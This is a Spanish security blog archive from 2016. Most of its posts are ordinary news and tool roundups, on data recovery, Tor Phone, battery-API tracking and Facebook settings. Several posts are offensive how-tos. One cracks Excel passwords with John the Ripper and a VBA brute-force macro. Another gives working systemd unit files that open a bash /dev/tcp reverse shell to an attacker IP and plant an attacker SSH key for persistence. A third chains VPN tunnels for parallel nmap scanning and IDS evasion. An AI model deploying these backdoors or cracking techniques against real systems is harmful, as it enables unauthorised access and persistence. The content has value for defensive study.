jueves, 8 de diciembre de 2016

Los mejores programas para recuperar archivos borrados por error

Cada día almacenamos más o más archivos en nuestro ordenador. Documentos, fotos, vídeo y todo tipo de ficheros que son de gran valor y que en un momento determinado podemos perder de manera inesperada. Un virus, un descuido o cualquier otra cosa puede hacer que perdamos o borremos archivos de nuestro disco duro de manera accidental, sin embargo, hoy en día existen herramientas capaces de ayudarnos a recuperar estos datos perdidos, aunque antes de nada, hay que decir que no siempre es posible recuperarlos.
Se pueden dar varias circunstancias por las que no podamos recuperar los archivos borrados, pero la esperanza debe ser lo último que se pierda y de ahí que vamos a mostrar a continuación algunas de las herramientas más utilizadas para la recuperación de datos perdidos en Windows.

Recuva

Cuando hablamos de recuperar datos borrados, sin duda, Recuva es una de las aplicaciones a las que más acuden los usuarios cuando se encuentran ante esta situación. Se trata de una herramienta que permite recuperar archivos eliminados tanto del ordenador como de otros dispositivos como memorias externas y que nos puede ayudar también en caso de tener un disco duro dañado o incluso para eliminar datos de forma totalmente segura y que nadie los pueda recuperar. Puedes ver con todo detalle cómo funciona Recuva en este tutorial elaborado por nuestros compañeros de SOFTZone.


TestDisk

Es otra herramienta que desde hace tiempo ofrece la recuperación de archivos borrados de manera eficiente. Se trata de una aplicación gratuita que permite recuperar las tablas de particiones Apple Partition map, GUID, MBR, Solaris o Xbox, por lo que ofrece soporte para casi cualquier sistema de archivos. De esta forma, es una gran herramienta cuando queremos recuperar particiones eliminadas o borradas tal y como puedes ver en este manual.

DMDE

Sin duda otro de los programas de referencia cuando se trata de recuperar archivos borrados, ya que se trata de un potente software para la recuperación, la búsqueda e incluso la edición de datos. Permite recuperar estructuras de directorios y archivos en circunstancias extrañas y donde otras herramientas no ofrecen grandes garantías gracias al uso de algoritmos especiales. Puedes descargar DMDE desde este enlace a su página web oficial.


Recovery My Files

Otra herramienta a tener en cuenta cuando necesitamos recuperar archivos borrados de nuestro disco duro, ya que además es muy sencillo de utilizar puesto que cuenta con un asistente que nos guiará en todo momento durante el proceso de recuperación de archivos. Al final del mismo, nos mostrará todos los archivos eliminados y que pueden ser recuperados para que fácilmente podamos restaurarlos en el mismo lugar donde estaban antes de ser borrados. Puedes conocer más sobre Recovery My Files en este pequeño tutorial elaborado por nuestros compañeros de REDESZone.

Minitool Power Data Recovery

Esta aplicación permite elegir el tipo de recuperación de datos que queremos hacer, es decir, si los datos han sido borrados, si son particiones perdidas o lo que queremos es recuperar archivos multimedia desde dispositivos de almacenamiento, recuperar datos de discos o particiones dañadas o incluso desde CDs o DVDs. Si quieres conocer como trabaja a fondo Monitool Power Data Recovery, te recomendamos que leas este post dedicado a esta herramienta.

Disk Drill

Es una potente herramienta para la recuperación de datos eliminados que está alimentada por múltiples algoritmos de recuperación de archivos capaces de escanear distintos sistemas de archivos como FAT32, EXT, HFS+ o NTFS, entre otros. Además, permite filtrar por el tipo de archivo que buscamos recuperar y cuenta también con la opción de restaurar toda una unidad o particiones eliminadas. Puedes ver el análisis realizado por nuestros compañeros de SOFTZone de esta herramienta en este mismo enlace.

Pandora Recovery

Pandora Recovery está diseñada para permitir encontrar y recuperar archivos borrados y recuperables de NTFS y volúmenes con formato FAT. Independientemente de su tipo, permite recuperar imágenes, canciones, películas, documentos, etc. La herramienta realiza un proceso de escaneado del disco duro con el fin de elaborar un índice de archivos existentes y eliminados, así como de las carpetas o directorios, en cualquier unidad lógica de nuestro PC para que posteriormente los podamos recuperar de manera sencilla. Puedes descargar Pandora Recovery desde este enlace a su página web oficial.

martes, 6 de diciembre de 2016

Obtener datos de tarjetas de crédito en 6 segundos [Paper]



Investigadores de la Universidad de Newcastle han publicado un nuevo mecanismo de ataque, denominado Distributed Guessing Attack [PDF] mediante el cual dicen que puede robar los datos de una tarjeta de crédito/débito en tan sólo seis segundos.

Las tarjetas se han convertido en un medio de pago en línea de facto. Esto también ha dado lugar a un aumento en el número de fraudes. ¿Qué métodos de seguridad se están adoptando para garantizar una transacción segura sin dinero en efectivo?

El estudio publicado en el IEEE Security & Privacy Journal muestra cómo se puede evitar todas las medidas de seguridad supuestamente implementadas para garantizar la seguridad de las transacciones en línea.

Sorprendentemente, esta intervención podría ayudar a los ciberdelincuentes a buscar números de tarjetas de crédito, códigos de seguridad, fechas de caducidad y otra información en tan sólo 6 segundos.

El ataque utiliza la respuesta (positiva o negativa) de la página de pago del comerciante para "adivinar" los datos y explora dos debilidades. En primer lugar, los sistemas de pago actuales no detectan múltiples solicitudes inválidas de la misma tarjeta desde diferentes sitios web. Esto implica que se pueden realizar conjeturas "ilimitadas"distribuyendo" la carga desde miles de sitios web. En segundo lugar, como los comerciantes proporcionan varios campos para introducir los datos, se puede adivinar de un campo a la vez.

Estas dos características facilitan las cosas a los atacantes y se pueden obtener todos los detalles de la tarjeta de crédito en cuestión de segundos, lanzado el ataque en varias páginas de pago. Con la ayuda de de ir "descartando" datos, puede verificar el número correcto de la tarjeta, el código de seguridad y el número de CVV desde diferentes sitios.




En el estudio, el ataque se llevó a cabo utilizando Firefox y scripts automatizados escritos en Java Selenium, un marco de automatización para navegadores web.

Después del estudio, los investigadores han notificado a Visa y otros sitios afectados y mientras que algunos sitios web han endurecido su configuración de seguridad, muchos optaron por ignorar esta advertencia.

Con el fin de mejorar la seguridad personal, los investigadores han sugerido que los titulares de tarjetas deben utilizar una sola tarjeta para los pagos en línea y reducir al mínimo el límite de gastos.

Fuente: FossBytes

lunes, 5 de diciembre de 2016

lo principal para desproteger un Excel con contraseña PU

Desde que soy consultor de seguridad una de las herramientas que más utilizo de mi arsenal de hacking es... Excel ... y cómo este blog va de lo que va... pues vamos a mostraros un pequeño "how-to" para romper las principales protecciones de nuestras hojas de cálculo favoritas.

Cifrar con contraseña

Algo muy común es proteger el acceso total al fichero con una contraseña:



Lo que hace Excel por debajo para proteger la hoja de cálculo de esta manera es cifrar el archivo con AES y una clave de 128 bits (ojo porque hay un pequeño truquito para aumentarla a 256 bits modificando el registro). Para romperlo, lo mejor en este caso es utilizar un ataque de diccionario con John the Ripper o cualquier otra herramienta que gustéis.... 

Primero obtenemos el hash de la contraseña del documento con office2john incluido en la versión jumbo 1.7.9 compilada por Robert Harris:

D:\Hacking\john-1.7.9-jumbo-7-Win-32\run>office2john.exe /cygdrive/d/Libro1.xlsx  > hash_excel.txt

/cygdrive/d/Libro1.xlsx:$office$*2010*100000*128*16*507e4f65f0c73a48077b22ce5473ccec*50946a93488c091f536b4063eb3ae667*799528a214fb108b73f91ef5806222ebf9049d87e963238ac5a1acf82f9eb9db
 
Ahora un poquito de benchmarking para comprobar la capacidad de mi patata de PC: 
D:\Hacking\john-1.7.9-jumbo-7-Win-32\run>john --test --format=office
Benchmarking: Office 2007/2010 SHA-1/AES [32/32]... DONE
Raw:    30.1 c/s real, 30.3 c/s virtual
 
Después iniciamos el ataque de fuerza bruta con el diccionario elegido: 
D:\Hacking\john-1.7.9-jumbo-7-Win-32\run>john -w:dicio.txt hash_excel.txt
Loaded 1 password hash (Office 2007/2010 SHA-1/AES [32/32])
123456           (/cygdrive/d/Libro1.xlsx)
guesses: 1  time: 0:00:00:00 DONE (Fri Mar 28 00:27:47 2014)  c/s: 14.83  trying
: 123456
Use the "--show" option to display all of the cracked passwords reliably
  
Y en menos de 5 segundos tenemos acceso al mismo, gracias en parte a que el dueño del documento utilizó una de las peores contraseñas posibles

Finalmente guardamos el fichero como Libro2.xlsm, pero antes en el desplegable 'Herramientas' seleccionamos 'Opciones generales' y eliminamos la contraseña de apertura:

  

Ojo que office2john sólo funciona con versiones 2007-2010, no con las versiones viejas que usan RC4 (office 97, 2000, XP, 2003). Por lo que tendrás que utilizar por ejemplo Free Password Recovery Softwarehashcat u otra herramienta.

Bloquear el proyecto VBA

Otra opción es establecer una contraseña para ver las propiedades o incluso visualizar el proyecto VBA (las macros). 




Sin embargo esta *irrisoria* protección es para el UI y básicamente añade unas pocas líneas al form:

CMG="0604AB00EA009E049E049A089A08"
DPB="C6B41DD07A30374D374DC8B3384DDC63D35C51C89D809616E325E4129493EEFDBC48EE77D47B79"
GC="6664CAA0CBE07BE17BE17B"

Estos campos corresponden a ProjectProtectionState, ProjectPassword y ProjectVisibilityState respectivamente. Por lo que si borramos esos campos (reemplazando el texto con espacios en blanco) Excel no nos pedirá una contraseña para ver el código del proyecto...

Para ello descomprimimos el fichero Libro2.xlsm como si de un zip se trataba, editamos el fichero xl\vbaProject.bin con notepad++ (u otro editor hexadecimal) y cambiamos DPB= por DBx=.

Luego guardamos el archivo con la misma extensión .BIN y agregamos al zip sustituyendo el mismo archivo.

Al abrir de nuevo el fichero Excel nos dirá que contiene una clave 'DPx' no válida:


Simplemente continuamos cargando el proyecto, ignoramos el error, asignamos una nueva contraseña en las propiedades de VBAProject y salvamos...

Al volver a abrirlo tendremos acceso al código de la macro:


Proteger hoja actual y estructura del libro

Otra opción que normalmente se utiliza es la de proteger la hoja actual y la estructura del libro para que otros usuarios no realicen cambios:


Sin embargo, quitar esta protección también es bastante trivial. Simplemente añade al proyecto VBA la siguiente macro: 


Sub PasswordBreaker()
    'Breaks worksheet password protection.
    Dim i As Integer, j As Integer, k As Integer
    Dim l As Integer, m As Integer, n As Integer
    Dim i1 As Integer, i2 As Integer, i3 As Integer
    Dim i4 As Integer, i5 As Integer, i6 As Integer
    On Error Resume Next
    For i = 65 To 66: For j = 65 To 66: For k = 65 To 66
    For l = 65 To 66: For m = 65 To 66: For i1 = 65 To 66
    For i2 = 65 To 66: For i3 = 65 To 66: For i4 = 65 To 66
    For i5 = 65 To 66: For i6 = 65 To 66: For n = 32 To 126
    ActiveSheet.Unprotect Chr(i) & Chr(j) & Chr(k) & _
        Chr(l) & Chr(m) & Chr(i1) & Chr(i2) & Chr(i3) & _
        Chr(i4) & Chr(i5) & Chr(i6) & Chr(n)
    If ActiveSheet.ProtectContents = False Then
        MsgBox "One usable password is " & Chr(i) & Chr(j) & _
            Chr(k) & Chr(l) & Chr(m) & Chr(i1) & Chr(i2) & _
            Chr(i3) & Chr(i4) & Chr(i5) & Chr(i6) & Chr(n)
         Exit Sub
    End If
    Next: Next: Next: Next: Next: Next
    Next: Next: Next: Next: Next: Next
End Sub

Ejecutalá y se mostrará la clave de respaldo que ocupa internamente el código de Excel en dicha hoja:   

A partir de ahora ya podremos editar la hoja excel e incluso desproteger el fichero:


Fuente: 
http://www.hackplayers.com/2014/03/como-desproteger-un-excel-con-password.html

jueves, 1 de diciembre de 2016

Abusando de los servicios de usuario de systemd



No sin cierta controversia, la mayoría de las distribuciones de Linux están adoptando o planeando adoptar el sistema de inicio systemd.

Como muchos ya sabéis, systemd se basa en el manejo de unidades (unit) que básicamente son cualquier recurso que el sistema sabe que puede operar y/o administrar, ya sea un servicio, socket, dispositivo, punto de montaje, etc. 

La forma en la que systemd debe manejar una unidad viene definida en ficheros que por defecto se encuentran en /etc/systemd/system, aunque podrían estar en cualquier otra ubicación como por ejemplo las de usuario que se encuentran normalmente en $HOME/.config/systemd/user o $HOME/.local/share/systemd/user/

Recordemos que systemd ofrece a los usuarios la capacidad de ejecutar una instancia de systemd para gestionar la sesión y los servicios que normalmente se ejecutan como un usuario diferente a root o un usuario especial. Por lo que si cualquier usuario puede interactuar con las unidades ubicadas en sus directorios también cualquiera puede configurar un servicio que se ejecute al inicio del sistema.

Y si ese servicio es... digamos... ¿una shell inversa? Pues como si de una oferta se tratase, tendríamos un 2x1 a explotar: backdoor y persistencia.

Empecemos con el backdoor, tan fácil como usar un dispositivo especial TCP en bash:

[Unit]
Description=Black magic happening, avert your eyes

[Service]
RemainAfterExit=yes
Type=simple
ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.10.100.123/31337; cat <&5 | while read line; do $line 2>&5 >&5; done"

[Install]
WantedBy=default.target

Sólo tenemos que copiar el fichero al dir correspondiente e iniciarlo con: $ systemctl --user start voodoo

Si la máquina del atacante está escuchando en el puerto indicado ($ echo "touch /tmp/systemd-test-backdoor" | nc -l 31337) y se tiene acceso desde el equipo de la víctima obtendremos inmediatamente la shell. Bastante sencillo, ¿verdad?

Pues no menos sencillo es conseguir persistencia. Sólo tenemos que activar el servicio con $ systemctl --user enable voodoo y, cada vez que un usuario se valide, systemd lanzará la shell inversa.

Podéis imaginaros que las posibilidades son muchas y variadas. Si queremos por ejemplo backdoorizar el acceso SSH podemos crear un fichero unit como el siguiente (fijaros que al contrario de lo que se hace normalmente ExecStop ejecuta el código y ExecStart lo limpia):

[Unit]
description=Totally not a virus, trust me I'm a dolphin
[Service]
RemainAfterExit=yes
Type=simple
ExecStop=/bin/bash -c 'mkdir -p $HOME/.ssh && touch $HOME/.ssh/authorized_keys; [ "$(grep "ssh-ed25519 AAAAC3NzbC1lZDI1NTE5AAAAIASFvY7r8vMkbLExcB3rJZSuHUSgPasy+Flwx5XtHTmH" $HOME/.ssh/authorized_keys)" ] || echo "ssh-ed25519 AAAAC3NzbC1lZDI1NTE5AAAAIASFvY7r8vMkbLExcB3rJZSuHUSgPasy+Flwx5XtHTmH" >> $HOME/.ssh/authorized_keys'
ExecStart=/bin/bash -c 'sed -i \'/ssh-ed25519 AAAAC3NzbC1lZDI1NTE5AAAAIASFvY7r8vMkbLExcB3rJZSuHUSgPasy+Flwx5XtHTmH/d\' $HOME/.ssh/authorized_keys'

[Install]
WantedBy=default.target

Y esto sólo son PoC... un atacante malintencionado iría aún más lejos y podría por ejemplo detectar cualquier usuario interactivo usando inotify en utmp para hacer menos ruido, encadenar archivos de servicio para detectar cuando otro interactúa, abusar de los aspectos en memoria de los archivos de servicio para ocultarse, secuestrar variables de entorno, obtener info en tiempo de ejecución de /proc, etc.

En definitiva, ¿cuándo fue la última vez que ejecutaste systemctl --user? No es que sea muy novedoso, pero es otra técnica a tener en cuenta y otro lugar que los administradores deben vigilar.

Fuentes:
abusing systemd user services 
systemd/User (Español)

miércoles, 30 de noviembre de 2016

Exploit 0-Day para Firefox parchea!



Los delincuentes han estado explotando una vulnerabilidad 0-Day en Firefox para desenmascarar a usuarios del navegador Tor, similar a la que había explotado el FBI durante la investigación de un sitio de pornografía infantil.

El exploit 0-Day se aprovecha de un Javascript diseñado para ejecutar código de forma remota en Windows y a través de un defecto de corrupción de memoria en Firefox.El exploit fue hecho publicó por un administrador en la lista de correo Tor-Talk.

El mensaje revela que el exploit afecta a Firefox y se está utilizando contra los usuarios del navegador Tor Browser, versión re-empaquetada de Mozilla Firefox que permite conexiones a través de la red Tor, para ocultar la dirección IP pública del usuario.

"[El código] consiste en un HTML y un archivo CSS. La funcionalidad exacta se desconoce, pero permite el acceso a VirtualAlloc en kernel32.dll". Esto significa que, cuando se explota con Javascript activado en un equipo Windows, se aprovechar de una vulnerabilidad de corrupción de memoria para hacer llamadas directas a kernel32.dll, lo que permite que el código se ejecute con permisos elevados en Windows.

Los investigadores también encontraron que el exploit realiza conexiones a la IP XXX.39.27.226, un servidor remoto alojado en OVH en Francia. Este servidor ya no está respondiendo en este momento.

Aunque los investigadores aún están analizando el código, un vistazo rápido permite determinar que es muy similar al utilizado por el FBI el año 2013, para tener acceso a sitios de pornografía infantil.

Hasta el momento se cree que la vulnerabilidad afecta desde Firefox 41 hasta la versión actual 50.

Todavía no se sabe quién está detrás del Javascript. Actualiza a Firefox 50.0.2.

Fuente: The Hacker News

martes, 29 de noviembre de 2016

Tor Phone el prototipo de Tor



Esperamos ver pronto y en la calle el llamado 'Tor Phone', un nuevo teléfono que ha sido diseñado por el desarrollador de Tor Mike Perry y que se basa en Copperhead OS, una distribución de Android que viene con múltiples mejoras de seguridad. Recordemos que el equipo de seguridad de Android de Google ha aceptado muchos parches de Copperhead en su base de código de Android.

"Copperhead es también la única ROM de Android que soporta el boot verificado, lo que evita que los exploits modifiquen las particiones de arranque, sistema, recuperación y proveedor
", explica Perry.

Tor Phone también usa OrWall, un firewall para Android que dirige todo el tráfico a través de la red Tor y bloquea otras conexiones, de forma similar a lo que hace la distro Tails Linux Live CD.
Además OrWall permite tener el control completo del smartphone, pudiendo elegir qué aplicación debe tener el tráfico cifrado por Tor.

De momento el prototipo actual tiene muchas "piezas" inacabadas. En el futuro, el proyecto desea añadir más soporte de dispositivos, soporte de MicroG, API de Netfilter, reducibilidad, estabilidad de Orbot, etc. 

Inicialmente el modelo del hardware elegido es el Google Nexus 6P. Podéis ver el detalle del proceso de instalación del prototipo en la web de Tor Project, además o animamos a colaborar o contribuir con el proyecto:


https://blog.torproject.org/blog/mission-improbable-hardening-android-security-and-privacy

lunes, 31 de octubre de 2016

VPNs levantados simultaneamente con OPENVPN

Ya sabes que hace poco liberaron 4nonimizer, un script en bash que permite ocultar la IP con la que salimos a Internet usando un proveedor VPN que soporte OpenVPN. Inicialmente la herramienta levanta un único túnel pero, ¿por qué no levantar varios de forma concurrente?"



Imaginad la posibilidad de usar una "cadena de proveedores VPN", es decir, establecer una VPN teniendo previamente otra levantada, y así varias veces para ocultar la IP real detrás de varias "capas". O la posibilidad de distribuir tráfico paralelamente durante un escaneo de puertos multiplicando la rapidez y de paso facilitando la evasión de IDS/IPS. Por poner dos claros ejemplos...

Pues nada más fácil, simplemente hay que levantar cada uno de los túneles añadiendo cada ruta con una métrica diferente y pata ello sólo hay que especificarlo en cada fichero de configuración correspondiente del cliente openvpn (.ovpn).

El siguiente script levantará automáticamente tantos túneles VPN como indiquemos:
#!/bin/bash
cp pass.txt ./multivpn
rm ./multivpn/*.ovpn

echo introduce numero de vpns concurrentes
read novpns

# Copia 3 ficheros ovpn adicionales por si algún peer falla
novpns=$((novpns + 3))

currentnovpns=0
while [ $novpns != $currentnovpns ]
do    
    randomvpn=$(ls *.ovpn | shuf -n 1)
    if [ ! -f ./multivpn/$randomvpn ]; then
        cp $randomvpn ./multivpn/ 
        echo "Copiado el fichero $randomvpn"
    fi
    currentnovpns=`ls -1 ./multivpn/*.ovpn 2>/dev/null | wc -l`
done

novpns=$((novpns - 3))

# levanta cada tunel con diferentes metricas
metric="20"
INT=$(ls /sys/class/net/ | grep -E '^eth|^en' | head -1)
GW=$(ip route show 0.0.0.0/0 dev $INT | cut -d\  -f3 | sort -u)

for file in $(ls ./multivpn/*.ovpn) 
    do
    echo "route-metric $metric" >> $file
    echo "route-nopull 1" >> $file
    echo "route 0.0.0.0 0.0.0.0 vpn_gateway $metric" >> $file
    metric=$((metric + 1))
done

cd multivpn

musthavetun=1
tries=1

for file in $(ls *.ovpn) 
do

    currenttun=$(ifconfig | grep tun | awk '{print $1}' | wc -l)
    echo -en "\nNúmero de túneles levantados: $currenttun\n"

    nohup openvpn $file 2>/dev/null &

    echo "Levantando interfaz de túnel"
    while [[ $currenttun -lt $musthavetun ]]
        do
            echo -en "."
            tries=$((tries + 1))
            sleep 1
            currenttun=$(ifconfig | grep tun | awk '{print $1}' | wc -l)
            if [ "$tries" = 30 ]
            then
                break
            fi
        done
    
    route del default gw $GW $INT 2>/dev/null
    route add default gw $GW $INT 2>/dev/null
    sleep 3
    if [ "$currenttun" = "$novpns" ]
    then 
        break    
    else
        musthavetun=$((musthavetun + 1))
        echo "ok!"
    fi
done

echo -e " todos los túneles levantados."

Sólo tenéis que copiarlo (multivpn.sh) al directorio donde tengáis los .ovpn (con 4nonimizer en '/opt/4nonimizer/vpn/proveedor') y copiará aleatoriamente algunos de estos ficheros al subdirectorio 'multivpn' para ejecutarlos después con el cliente openvpn y establecer los túneles uno tras otro: 
# bash multivpn.sh 
introduce numero de vpns concurrentes
4
Copiado el fichero VpnProvider.Singapore-Singapore-NO-TORRENTS-TCP.ovpn
Copiado el fichero VpnProvider.Denmark-Lyngby-TCP.ovpn
Copiado el fichero VpnProvider.USA-NewJersey-NO-TORRENTS-TCP.ovpn
Copiado el fichero VpnProvider.Turkey-Istanbul-UDP.ovpn
Copiado el fichero VpnProvider.Latvia-Riga-NO-TORRENTS-UDP.ovpn
Copiado el fichero VpnProvider.Singapore-Singapore-NO-TORRENTS-UDP.ovpn
Copiado el fichero VpnProvider.Tunisia-Tunis-UDP.ovpn

Número de túneles levantados: 0
Levantando interfaz de túnel
....ok!

Número de túneles levantados: 1
Levantando interfaz de túnel
....ok!

Número de túneles levantados: 2
Levantando interfaz de túnel
.......ok!

Número de túneles levantados: 3
Levantando interfaz de túnel
.... todos los túneles levantados.

Después de su ejecución podéis comprobar que los interfaces de túnel (tun0, tun1, tun2, etc.) han sido creados:
# ifconfig
eth0 Link encap:Ethernet  HWaddr 50:7a:6d:f5:1a:12  
          inet addr:192.168.1.180  Bcast:192.168.1.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:322235 errors:0 dropped:0 overruns:0 frame:0
          TX packets:215243 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:149725996 (149.7 MB)  TX bytes:17969308 (17.9 MB)
          Interrupt:16 Memory:e1300000-e1320000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:1527 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1527 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:9467111 (9.4 MB)  TX bytes:9467111 (9.4 MB)

tun0      Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  
          inet addr:10.8.0.10  P-t-P:10.8.0.9  Mask:255.255.255.255
          UP POINTOPOINT RUNNING NOARP MULTICAST  MTU:48000  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

tun1      Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  
          inet addr:10.9.0.42  P-t-P:10.9.0.41  Mask:255.255.255.255
          UP POINTOPOINT RUNNING NOARP MULTICAST  MTU:48000  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

tun2      Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  
          inet addr:10.8.0.6  P-t-P:10.8.0.5  Mask:255.255.255.255
          UP POINTOPOINT RUNNING NOARP MULTICAST  MTU:48000  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

tun3      Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  
          inet addr:10.9.0.14  P-t-P:10.9.0.13  Mask:255.255.255.255
          UP POINTOPOINT RUNNING NOARP MULTICAST  MTU:48000  Metric:1
          RX packets:13 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100 
          RX bytes:1312 (1.3 KB)  TX bytes:0 (0.0 B)

Y que las rutas han sido creadas con las métricas establecidas:
# route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         192.168.1.1     0.0.0.0         UG    0      0        0 eth0
0.0.0.0         10.8.0.9        0.0.0.0         UG    20     0        0 tun0
0.0.0.0         10.9.0.41       0.0.0.0         UG    21     0        0 tun1
0.0.0.0         10.8.0.5        0.0.0.0         UG    22     0        0 tun2
0.0.0.0         10.9.0.13       0.0.0.0         UG    23     0        0 tun3
10.8.0.5        0.0.0.0         255.255.255.255 UH    0      0        0 tun2
10.8.0.9        0.0.0.0         255.255.255.255 UH    0      0        0 tun0
10.9.0.13       0.0.0.0         255.255.255.255 UH    0      0        0 tun3
10.9.0.41       0.0.0.0         255.255.255.255 UH    0      0        0 tun1
169.254.0.0     0.0.0.0         255.255.0.0     U     1000   0        0 eth0
192.168.1.0     0.0.0.0         255.255.255.0   U     100    0        0 eth0

A partir de ahí lo que dictamine vuestra imaginación... por ejemplo, lanzar varios escaneos en paralelo con nmap simplemente especificando cada vez un interfaz distinto dentro de un loop:

nmap -sT -Pn -p$port_range -oX salida.xml $network -e tun$iface_number &

De esta manera podremos jugar como queramos como escanear cada rango de puertos de un mismo host desde ubicaciones geográficas diferentes, tal y como se muestra en la siguiente imagen (bmon) con 15 túneles simultáneamente:


¿Interesante verdad? Pues atentos porque pronto actualizaran 4nonimizer con ésta y otras interesantes opciones :)

lunes, 8 de agosto de 2016

Cómo el estado de la batería de tu smartphone puede ser usado para identificarte





Otra vuelta de tuerca contra la privacidad al parecer se están utilizando los indicadores de estado de batería para realizar seguimiento a dispositivos, o al menos eso corroboran los investigadores de la Universidad de Princeton.

Existe un estándar web *de momento y al parecer* poco conocido que permite a los propietarios de los sitios web ver en detalle el tiempo de duración de la batería de un dispositivo móvil, algo que sin embargo y que ya se advirtió... podría permitir el seguimiento online.

La API de estado de la batería se introdujo en la quinta versión de HTML5, disponible en agosto de 2015 en Firefox, Opera y Chrome, y como comentamos permite a los propietarios del sitio ver el porcentaje de duración de la batería de un dispositivo, así como el tiempo que tardará en agotarse o el tiempo que necesita para cargarse, además de si está conectado a una fuente de alimentación.

Precisamente la combinación del porcentaje y de los segundos de duración de la batería ofrece 14m combinaciones, proporcionando un identificador pseudo-único para cada dispositivo.

Supongamos que un usuario carga una página web "A" en su versión de Firefox y luego abre otra página web "B" utilizando un navegador Chrome en modo de navegación privada y a través de una VPN segura. Por lo general, sería muy difícil asociar las dos conexiones entre sí, pero si se abren ambas páginas casi a la vez es posible saber que los dos dispositivos son el mismo viendo el estado de la batería.

Ahora, dos investigadores de seguridad de la Universidad de Princeton han demostrado que el indicador de estado de la batería se está utilizando en la práctica realmente para realizar un seguimiento de los usuarios. Mediante la ejecución de un navegador especialmente modificado, Steve Engelhard y Arvind Narayanan encontraron dos secuencias de comandos de seguimiento que utilizan la API de "huella digital" de un dispositivo específico, lo que les permite identificarlo continuamente a través de múltiples contextos.

La investigación fue subrayada por Lukasz Olejnik, uno de los cuatro investigadores que llamó primero la atención sobre los posibles problemas con la API de estado de la batería en el año 2015. Aunque Olejnik logró cierta repercusión después de su advertencia, la API todavía tiene el potencial de usarse de forma indebida.

Y mientras que de momento parece que sólo se utiliza para seguimiento, Olejnik advierte: "Algunas empresas pueden estar analizando la posibilidad de monetizar el acceso a los niveles de la batería", escribe. "Cuando la batería se está agotando, las personas podrían ser propensos a tomar ciertas decisiones. En tales circunstancias, los usuarios estarán de acuerdo en pagar más por un servicio".

Fuentes:
- Your battery status is being used to track you online
- Paper: The leaking battery - A privacy analysis of the HTML5 Battery Status API

jueves, 7 de julio de 2016

Cómo revisar y aprobar lo que aparece en tu Timeline de Facebook


¿Por qué te interesaría revisar y aprobar todo lo que aparece en tu Timeline de Facebook? La razón es simple: todos tenemos un amigo que etiqueta a todo el mundo en sus post (políticos, eventos, opiniones, etc) y no nos interesa.
Incluso, es posible que no estemos de acuerdo con el propio contenido (y en ocasiones puede que hasta estemos considerablemente en contra de lo que ha publicado). Ante esto, tenemos dos opciones: bloquear a nuestro amigo (que puede ser una solución demasiado drástica) o habilitar un modo por el que revisar y aprobar lo que aparece en nuestro Timeline de Facebook.
Gracias a ello, tendremos el control absoluto sobre todo lo que se publique en nuestra biografía.

Recupera tu algoritmo anterior de Facebook en tres pasos

Eso sí, es importante tener en cuenta que esto no te permitirá ser un “censor de Facebook” o despublicar cualquier contenido que te parezca inapropiado. Simplemente, puedes evitar que aparezca en tu muro cualquier información en la que te etiqueten.
¿Esto qué implica? Te podrán seguir etiquetando y tu nombre aparecerá una vez publicado, y los amigos de quien lo haya compartido podrán verla. Por lo tanto, lo que haremos será evitar que aparezca en nuestro muro y que nuestros contactos puedan visualizarla.
Además, esto no impide que las personas que tengas agregadas puedan añadir cosas en tu muro utilizando la opción de Compartir. Así, sólo afecta a las etiquetas.

martes, 24 de mayo de 2016

Uso elevado de CPU si utilizas un nombre de usuario que contenga "user" en Windows 8.1

Estoy algo liado pero permitirme dejarles sólo una pequeña píldora, en este caso un bug que apareció en mayo del año pasado pero que ha vuelto a salir a la palestra a raíz de comentarse recientemente en Reddit y otros medios sociales. Se trata de que si usas un nombre de cuenta de usuario que contenga la palabra "user" en Windows 8.1 veras como el proceso taskhost.exe consume un alto porcentaje de CPU de forma intermitente debido a un problema en el componente DFPCommon.dl.

Pero lejos de publicar un parche, para resolverlo Microsoft nos lo pone fácil: "Para resolver el problema, no cree una cuenta de usuario que contenga la cadena 'user' en el equipo":


https://support.microsoft.com/en-us/kb/3053711


Sin comentarios. Y si ya la estabas utilizando tienes dos opciones, borrarla o renombrarla... o como leía en algún otro foro otra solución sería "No usar Windows". 

lunes, 23 de mayo de 2016

17 años de cárcel por obtener vídeos eróticos de menores por 'Whatsapp'



El procesado por un delito continuado de corrupción de menores y otro continuado de abuso sexual ha reconocido este lunes los hechos que le imputó la Fiscalía del Principado de Asturias y ha aceptado penas que suman 17 años de prisión, junto con 39 años de alejamiento y 10 de libertad vigilada.


El hombre contactaba con niñas de entre 11 y 12 años a través de la aplicación móvil WhatsApp y se hacía pasar por menor de edad para obtener fotos y vídeos suyas de contenido sexual -que luego compartía por Internet- y, con una de ellas, llegó a mantener numerosos encuentros sexuales, fingiendo ser el padre del supuesto adolescente.


La vista oral estaba señalada para este lunes en la Sección Segunda de la Audiencia de la Audiencia Provincial de Asturias, con sede en Oviedo, aunque el reconocimiento de los hechos por parte del procesado evitó su desarrollo.

